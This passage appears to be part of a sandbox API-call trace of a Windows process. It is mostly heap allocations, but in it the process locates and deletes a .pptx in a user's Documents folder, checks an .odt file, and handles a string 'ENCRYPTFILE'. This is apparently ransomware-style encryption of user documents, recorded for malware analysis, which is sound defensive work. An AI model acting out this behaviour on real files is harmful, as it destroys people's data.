Flags=0x0, Size=0x10) returned 0x43ca5c8 [0079.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0079.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0079.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0079.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.287] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\g_XT5mjGuHk8Nmh4F.pptx", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe20f20, ftCreationTime.dwHighDateTime=0x1d5e0ea, ftLastAccessTime.dwLowDateTime=0x240c9dd0, ftLastAccessTime.dwHighDateTime=0x1d5e626, ftLastWriteTime.dwLowDateTime=0x240c9dd0, ftLastWriteTime.dwHighDateTime=0x1d5e626, nFileSizeHigh=0x0, nFileSizeLow=0xb11b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="g_XT5mjGuHk8Nmh4F.pptx", cAlternateFileName="G_XT5M~1.PPT")) returned 0x41ac2c0 [0079.288] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\g_XT5mjGuHk8Nmh4F.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\g_xt5mjguhk8nmh4f.pptx")) returned 1 [0079.293] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe20f20, ftCreationTime.dwHighDateTime=0x1d5e0ea, ftLastAccessTime.dwLowDateTime=0x240c9dd0, ftLastAccessTime.dwHighDateTime=0x1d5e626, ftLastWriteTime.dwLowDateTime=0x240c9dd0, ftLastWriteTime.dwHighDateTime=0x1d5e626, nFileSizeHigh=0x0, nFileSizeLow=0xb11b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="g_XT5mjGuHk8Nmh4F.pptx", cAlternateFileName="G_XT5M~1.PPT")) returned 0 [0079.294] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dcf8 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.294] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0079.294] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0079.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0079.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0079.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0079.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0079.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0079.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.295] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.295] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0079.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.295] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0079.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0079.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24e0 [0079.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0079.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0079.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0079.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0079.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0079.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0079.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0079.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0079.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0079.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0079.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5358 [0079.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0079.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0079.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0079.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0079.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.301] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0079.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.301] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0079.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.301] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\hR3cojo6WftWpyW3h.odt", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4429be70, ftCreationTime.dwHighDateTime=0x1d5e0b0, ftLastAccessTime.dwLowDateTime=0x502b6580, ftLastAccessTime.dwHighDateTime=0x1d5e339, ftLastWriteTime.dwLowDateTime=0x502b6580, ftLastWriteTime.dwHighDateTime=0x1d5e339, nFileSizeHigh=0x0, nFileSizeLow=0xa840, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="hR3cojo6WftWpyW3h.odt", cAlternateFileName="HR3COJ~1.ODT")) returned 0x41ac700 [0079.302] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0079.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0079.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0079.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0079.302] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0079.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0079.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.303] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0079.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0079.303] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0079.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0079.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0079.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0079.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24d0 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0079.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0079.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0079.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0079.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0079.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0079.306] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0079.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 